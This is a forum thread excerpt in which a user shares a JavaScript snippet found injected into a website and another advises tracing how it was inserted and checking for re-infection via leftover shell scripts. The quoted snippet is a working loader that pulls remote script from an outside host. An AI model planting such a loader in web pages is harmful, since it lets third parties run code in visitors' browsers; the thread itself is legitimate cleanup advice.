Quote:
Originally Posted by socialteenz
The site which i have access is undergoing server update, i will get you the details once it's done.
This was the code found on their site..
PHP Code:
<script type="text/javascript"> var win = []; win['webid'] = '46157fb85796a03666'; win['traffic'] = '0'; win['raw'] = '2'; win['pop'] = '0'; (function() { var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true; var selectGtp = document.getElementsByTagName('script')[0]; pGTP.src = 'https://adnety.com/dashboard/call.js'; selectGtp.parentNode.insertBefore(pGTP, selectGtp); })(); </script>
|
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way

. Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.
While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).